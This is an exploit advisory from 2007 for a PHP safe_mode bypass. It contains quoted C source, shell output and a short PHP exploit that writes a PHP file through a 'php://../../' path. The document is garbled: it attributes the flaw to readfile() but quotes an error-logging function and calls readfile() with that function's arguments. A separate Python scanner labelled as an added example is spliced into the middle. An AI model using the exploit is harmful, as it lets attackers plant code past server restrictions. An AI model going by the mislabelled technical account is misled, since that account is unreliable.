
php-readfile.txt
Posted Mar 27, 2007
Authored by ThE-WolF-ksA

PHP versions below 4.4.4, 5.2.1, and 5.1.6 suffer from a readfile() safe mode bypass vulnerability.

tags | exploit, php, bypass
SHA-256 | 2f92559142ea978bb19ae97f7de8910992d71b174807d71a769362f9bf62af97

SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007


Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4


[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]

Author: ThE-WoLf-KsA
Date:
-Written: 24.3.2007


--- 0.Description ---


--- 1. readfile() Safe Mode Bypass ---
The readfile() function reads through a file, or displays your file or
path. You can read into files. The issue is very simple: readfile()
checks safe_mode and open_basedir in the stream function, but using a
URL isn't allowed, and the problem lies in an incorrect filename.

PHP5:
-2013-2050---
PHPAPI int _php_readfile(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {

        case 1: /*send an email */
            {
#if HAVE_SENDMAIL
                if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
                    return FAILURE;
                }
#else
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
                return FAILURE;
#endif
            }
            break;

        case 2: /*send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3: /*save to a file */
            stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
-2013-2050---

Let's look at option 3.

-2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
-2038 line---

Mode "a" writes the error to the file or, if the file doesn't exist,
creates a new file.
The problem is that "IGNORE_URL" is passed to
php_stream_open_wrapper().
IGNORE_URL turns off safe_mode if you use "prefix://../../".

-Example---
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'

Warning: readfile(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: readfile(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
-Example---
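
The destination form shown above, turned into a source-audit check (an added example, not part of the original advisory or of PHP's code): it flags PHP string literals of the "prefix://../" shape and reports the path each one normalises to. The sample source, the `cwd` value and the textual-normalisation model in `resolve()` are assumptions of this sketch.

```python
import posixpath
import re

# "prefix://" followed by a ".." path component: the destination form the
# advisory uses ("php://../../...").
PREFIXED_TRAVERSAL = re.compile(
    r"^[A-Za-z][A-Za-z0-9+.\-]*://(?:[^/]*/)*?\.\.(?:/|$)")
# A single- or double-quoted PHP string literal; backslash escapes are skipped
# over, not interpreted.
PHP_STRING = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")


def resolve(dest, cwd):
    """Normalise dest textually as a relative path under cwd.

    Assumption of this sketch: the prefixed string ends up handled as a plain
    path, so "prefix:" is just one more component that ".." can cancel.
    """
    return posixpath.normpath(posixpath.join(cwd, dest))


def scan_php(source, cwd="/"):
    """Return (line_no, literal, resolved_path) for each suspicious literal."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in PHP_STRING.finditer(line):
            literal = match.group(2)
            if PREFIXED_TRAVERSAL.match(literal):
                findings.append((line_no, literal, resolve(literal, cwd)))
    return findings


# Constructed sample: line 2 is the direct path, line 3 the advisory's prefixed
# form, line 4 an ordinary wrapper use that must not be flagged, line 5 the
# concatenated form used in the exploit section.
SAMPLE = r'''<?php
$a = "/www/temp/sr.php";
$b = "php://../../www/temp/sr.php";
$in = fopen('php://stdin', 'r');
$c = "php://../../" . $file;
'''

if __name__ == "__main__":
    for finding in scan_php(SAMPLE, cwd="/root"):
        print(finding)
```
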

--- 2. Exploit ---
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>



--- 4. Greets ---
SniPer_hex

--- 5. Contact ---
ThE-WolF-ksA@hotmail.com
